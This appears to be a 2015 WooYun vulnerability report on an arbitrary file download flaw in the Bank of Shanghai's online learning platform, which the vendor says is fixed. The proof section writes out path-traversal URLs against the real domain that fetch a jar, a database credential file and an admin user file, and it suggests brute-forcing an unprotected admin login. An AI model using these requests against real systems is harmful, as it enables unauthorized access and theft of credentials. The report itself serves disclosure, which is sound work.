漏洞概要
关注数(24)
关注此漏洞
漏洞标题:上海银行某系统任意文件下载导致敏感信息泄露
提交时间:2015-09-08 15:36
修复时间:2015-10-26 17:34
公开时间:2015-10-26 17:34
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-09-08: 细节已通知厂商并且等待厂商处理中
2015-09-11: 厂商已经确认,细节仅向厂商公开
2015-09-21: 细节向核心白帽子及相关领域专家公开
2015-10-01: 细节向普通白帽子公开
2015-10-11: 细节向实习白帽子公开
2015-10-26: 细节向公众公开
简要描述:
详细说明:
漏洞证明:
上海银行网上学习平台(系统URL地址:http://learning.bankofshanghai.com/)存在任意文件下载漏洞,导致敏感信息泄露。
系统首页为,确定上海银行系统
举例说明:
1.直接访问如下URL,下载wis18.jar包
http://learning.bankofshanghai.com/wis18/file.showimage.flow?filename=../WEB-INF/lib/wis18.jar
可以对该jar包进行反编译获取源代码。
2.数据库配置文件下载,直接访问如下URL
http://learning.bankofshanghai.com/wis18/file.showimage.flow?filename=../system/config/ds.xml
包含数据库主机IP、用户名、密码等
3.管理员配置文件,用户名admin,密码是DES加密的
http://learning.bankofshanghai.com/wis18/file.showimage.flow?filename=../system/config/manauser.xml
该系统使用了DES加密,经过一番寻找,在jar包反编译后的com\wis18\core\util目录中找到了EncryptAndDecrypt.java文件,该文件该文件包含秘钥strDesKey
有了秘钥是不是可以去破解下后台管理员的密码呢,试了下了没解密成功,
但是经过测试该系统后台登录无验证,当然可以试试暴力破解了。
但该系统后台登录地址为:http://learning.bankofshanghai.com/wis18/login/manalogin.jsp
OK,问题证明到此。
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2015-09-11 17:33
厂商回复:
已修复
最新状态:
暂无